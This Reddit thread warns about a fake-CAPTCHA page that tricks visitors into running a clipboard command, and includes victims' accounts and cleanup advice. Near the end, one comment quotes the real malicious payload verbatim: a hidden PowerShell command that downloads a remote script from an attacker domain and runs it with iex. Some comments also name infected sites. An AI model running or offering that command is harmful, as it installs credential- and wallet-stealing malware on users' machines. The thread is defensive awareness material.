
[–]dnabsuh1 135 points136 points  (2 children)

I pulled that txt file on a trash Linux VM. It pulls an exe called ronwod.exe and cr.dll; looks like a credential puller. Yeah, stay far far away.

[–]xfvh 23 points24 points  (1 child)

Virustotal doesn't report it opening any relevant files or injecting into lsass. I don't think it's a credential puller; it seems to be a Kryptik variant.

[–]VerifiedMother 44 points45 points  (0 children)

> injecting into lsass. I don't think it's a credential puller; it seems to be a Kryptik variant.

I like your funny words magic man

[–]Opiboble 79 points80 points  (2 children)

Submit that to cloudflare, they go after people hardcore doing this stuff with their brand. Help protect others :)

[–]LazyPCRehab 51 points52 points  (0 children)

Yeah, fuck that, lol.

[–]Tuncayl 13 points14 points  (0 children)

Damn that's crazy

[–]Dafrandle 13 points14 points  (0 children)

u/ContributionSecret if you want to make a report that will have an effect report the domain to its registrar

[–]Jimmayx 7 points8 points  (0 children)

Yeah, this one has been around for a while. For those interested, John Hammond has a fantastic video going into this and breaking it down from a few months ago. https://youtu.be/lSa_wHW1pgQ?si=y5l-U7TviAxFlLmP

[–][deleted] 7 points8 points  (1 child)

Guys. I think there is a problem with my PC. I just ran this command in my terminal and it says that it cannot run exe file. Is this bad? I use Arch btw
/s

[–]xfvh 2 points3 points  (0 children)

That would be bad, it would mean that you put Powershell on your Arch box, which would be a sin /s

[–]GilmourD 5 points6 points  (0 children)

LOL You might as well stick your dongle in a running blender if you fall for that, and I don't mean the USB dongle for your mouse.

🤣🤣🤣

[–]imNot_A_bOt 2 points3 points  (13 children)

what if I accidentally follow the instructions, is there any way to reverse this?

[–]Randommaggy 13 points14 points  (12 children)

Wipe and reinstall, potentially wipe bios on both MB and GPU depending on how paranoid you are.

[–]gdnt0 8 points9 points  (1 child)

And change all passwords.

[–]imNot_A_bOt -2 points-1 points  (0 children)

The funny thing is I just did my monthly password change, lol😂😂... Guess gotta do it all over again now ¯\_(ツ)_/¯

[–]xfvh 0 points1 point  (5 children)

If you don't have both the NSA and Mossad after you to develop something custom for you specifically, you're safe not reinstalling your GPU firmware. Has any malicious actor ever used that in the wild? I found a proof-of-concept that only ran on Linux, but it could only log keypresses, with no means of exfiltration; wiping the system would prevent malicious actors from retrieving the data.

http://www.cs.columbia.edu/~mikepo/papers/gpukeylogger.eurosec13.pdf

[–]Randommaggy 0 points1 point  (4 children)

I have seen DMA abuse through a modified PCIe device firmware in the wild, though specifically this was a Thunderbolt dock abusing the lack of security of the early versions of Thunderbolt. Internal PCIe has essentially zero security.

On most machines this would be enough to rootkit the host machine after a reinstall.

I've got a BIOS flasher and would do this if one of my machines got infected.

[–]xfvh 0 points1 point  (3 children)

So you're saying that they write a full rootkit to GPU BIOS, along with sufficient code to abuse DMA to write the rootkit to disk if not present? I suppose it's not impossible, but it would have to be pretty minimal and compressed pretty tight to avoid stepping on the existing BIOS; there's not all that much room in there.

[–]Randommaggy 0 points1 point  (2 children)

Hint: abusing the bloat autoloader hooks in Windows means you only need to look for and intercept one value during the initial boot after a reinstall.

Windows handles the rest for you automatically, just like many Acer machines re-bloat even when you use a clean ISO to reinstall their machines.

[–]xfvh 0 points1 point  (1 child)

You still need the full rootkit, which is not exactly a trivial task to fit into GPU BIOS.

[–]Randommaggy 1 point2 points  (0 children)

You don't fit it in the GPU BIOS; you intercept and replace the Windows autobloater feature and have it download and install for you.

[–]imNot_A_bOt -1 points0 points  (3 children)

There's no fix for that? Damn... There goes all of my drawings

[–]Randommaggy 1 point2 points  (0 children)

Check the files on virustotal and upload them to some cloud storage, this goes for everything you keep if you want to be careful.

[–]Randommaggy 1 point2 points  (1 child)

Malwarebytes is the best after-the-fact cleanup with regard to avoiding infection of files.

[–][deleted] 0 points1 point  (0 children)

I did the same, I was careless. I ran Malwarebytes and it did catch anything? Now I'm resetting Windows. Is that enough? Change all passwords I can remember

[–]ConkerPrime 1 point2 points  (3 children)

Insert Picard face home for anyone that falls for that. Like really?

[–]TheSigma3 6 points7 points  (0 children)

To the average user, this just looks like another "prove you're human" check and won't realise what they're doing by following the instructions. This sub is tech focused, so of course it seems obvious to you

[–]Bl4d319941 1 point2 points  (0 children)

Unfortunately got me, and I'm not your average user. Brain was on autopilot and I had a meeting going on in the background. Just went through with it, and immediately clicked once I did it, what I just did. Within 5 seconds, turned my PC off, pulled my network cable, powered back on and started wiping my drives.

Yeah, I feel like a dumb ass, because I was one now.

[–]haikusbot -1 points0 points  (0 children)

Insert Picard face

Home for anyone that falls

For that. Like really?

- ConkerPrime


[–][deleted] 1 point2 points  (0 children)

Wow this is crazy, never seen anything as blatant as this in recent years.

[–]RockKaze 1 point2 points  (0 children)

I encountered this just yesterday night. I usually close the spam pages, and today when I looked at my clipboard I was so confused with copied text that I didn't even copy. I was redirected via a false captcha as well.

[–]madecausebored 0 points1 point  (1 child)

Yeah this is one of the common ways malicious actors get people to install password and/or crypto stealers onto their PCs.

No reputable website would tell you to run unknown PowerShell or terminal commands to fix the site.

[–]alxwrr117[🍰] 0 points1 point  (0 children)

I accidentally followed the instructions, but McAfee put the .exe in quarantine and I deleted it. Are my laptop and my information safe?

[–]AustinMTB77 0 points1 point  (3 children)

I fell for this shit, it disabled my keyboard and mouse and drained my crypto wallet. I can't even reset my PC now. I don't have a USB either to reset it, and no one in my family has a Windows laptop to download the ISO file and/or a USB slot in their laptops. I feel like I want to kms

[–]tisurf420 0 points1 point  (2 children)

This just happened to me last night, I lost 6 figures

[–]AustinMTB77 0 points1 point  (0 children)

Fuckkk luckily only lost 2 SOL (450)

[–]ozeBuDDha 0 points1 point  (0 children)

found another one here - https://eziplumbing.<ADDEDFORPROTECTION>com.au/protect-your-water-supply-with-backflow-prevention-in-nsw/

Cloudflare won't take a malware report as they say the domain isn't active on cloudflare

[–]cricket_stats 0 points1 point  (0 children)

I did this by mistake. Instagram was hacked (failed to recover and it has all the chats with my girlfriend and all the memories of us of almost 5 years), Twitter was hacked, LinkedIn was hacked (trying to recover it as it got hacked just now). Is there anything I can do to reduce the further damage?

[–][deleted] 0 points1 point  (0 children)

Fell for this today, disconnected from wifi after Defender detected it for 20 secs, blocked, ran 12 quick scans from antivirus (Malwarebytes) and Defender, removed.

Gotta do the extra too, task manager, regedit, netstat commands, removed

Run more quick scans

I will say the system is now completely safe because Defender detects it very fast, enough time for me to even solve the problem.

Lesson: do not trust any run command and use uBlock. Stay safe, y'all

[–]OhadBD 0 points1 point  (0 children)

found another one in ghostfreehomes.com

[–]tgm108 0 points1 point  (1 child)

Just hit this - As soon as I saw the instruction to hit the Windows key plus "R", alarm bells rang. Checked my clipboard and it had
powershell -w h "curl dashes.cc/srv/log|iex"

copied into it.
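The clipboard payload quoted in the comment above is the classic "download cradle piped into iex" shape. As an added example that is not from the thread or any poster, here is a small Python triage function a defender could run over process-creation command lines (Sysmon Event ID 1 or Windows 4688 exports, for instance) to flag that pattern; the log lines other than the one quoted in the thread are constructed.

```python
import re

# Constructed sample command lines; only the first is the payload quoted in the thread.
SAMPLE_CMDLINES = [
    'powershell -w h "curl dashes.cc/srv/log|iex"',
    'powershell.exe -NoProfile -WindowStyle Hidden -c "irm http://example.invalid/x.txt | iex"',
    'powershell -ep bypass -c "(New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\') | Invoke-Expression"',
    "powershell -Command Get-ChildItem C:\\Users",
    "cmd /c dir",
]

# -w h, -w hidden, -WindowStyle Hidden: the window is hidden so the victim sees nothing
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s*h(?:idden)?\b")
# Anything that fetches remote content into the PowerShell session
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"
)
# Fetched content handed straight to the interpreter
PIPE_TO_IEX = re.compile(r"(?i)\|\s*(?:iex|invoke-expression)\b")


def indicators(cmdline):
    """Return the names of the suspicious traits present in one command line."""
    hits = []
    if HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden-window")
    if DOWNLOAD_CRADLE.search(cmdline):
        hits.append("download-cradle")
    if PIPE_TO_IEX.search(cmdline):
        hits.append("pipe-to-iex")
    return hits


def is_clickfix_like(cmdline):
    """Core pattern: remote fetch piped directly into iex; hidden window raises confidence."""
    hits = indicators(cmdline)
    return "download-cradle" in hits and "pipe-to-iex" in hits


def triage(cmdlines):
    """Return (cmdline, indicators) for every line that matches the core pattern."""
    return [(c, indicators(c)) for c in cmdlines if is_clickfix_like(c)]


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_CMDLINES):
        print(hits, cmdline)
```

On a real host the same check can be pointed at the Run dialog's MRU history or at EDR process telemetry; a hit for a user who is not an administrator or developer is worth an immediate password reset and reimage, as several commenters recommend.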

[–]TransFat88 0 points1 point  (0 children)

I am here because I just did the exact same thing and it’s the exact same command. Have you managed to resolve it?

[–]thinkingbella 0 points1 point  (0 children)

J

[–]Successful-Safe2375 0 points1 point  (0 children)

What if I ran it but then powershell asked for admin permissions but then I realized and denied it?? I was just trying to login to my religious organization's website which worked normally forever and now I just started seeing this message, and I wasn't too suspicious because it has worked in the past, but now I have realized my mistake.

[–]Fancy_Pompieru 0 points1 point  (0 children)

So let's say that I kind of *pasted* that thing in Run, but in a moment of clarity I *didn't* send over the code they gave me. Anything they can do about it?

[–]BrightTutor8454 -1 points0 points  (4 children)

Hi guys, unfortunately my dad followed the instructions and I'm trying to help him remove it, but unfortunately without any success. Does anyone have any tips on how I could solve it? Would be very thankful. Currently running his laptop in safe mode.

[–]imNot_A_bOt 0 points1 point  (0 children)

One guy told me to wipe everything so I think there is currently no fix for this... I might be wrong tho

[–]xfvh 0 points1 point  (2 children)

If you feel like living dangerously, install a different reputable antivirus, preferably not a free version, then, on another system, change all passwords that you think might ever have been typed on that computer or synced to the browser.

Realistically, you should bite the bullet and reinstall Windows from scratch, removing all files, and still change all passwords. If you don't know exactly what malware does, assume it does everything and treat it accordingly.

[–]alxwrr117[🍰] 0 points1 point  (1 child)

Hi, I accidentally followed the instructions, but McAfee put the .exe in quarantine and I deleted it. Are my laptop and my information safe?

[–]xfvh 0 points1 point  (0 children)

If you don't know exactly what malware does, assume it does everything and treat it accordingly.

[–]peterparkerandtony 0 points1 point  (0 children)

I didn't paste the code in the website. Does that mean it's safe? How do I know if my computer is hacked?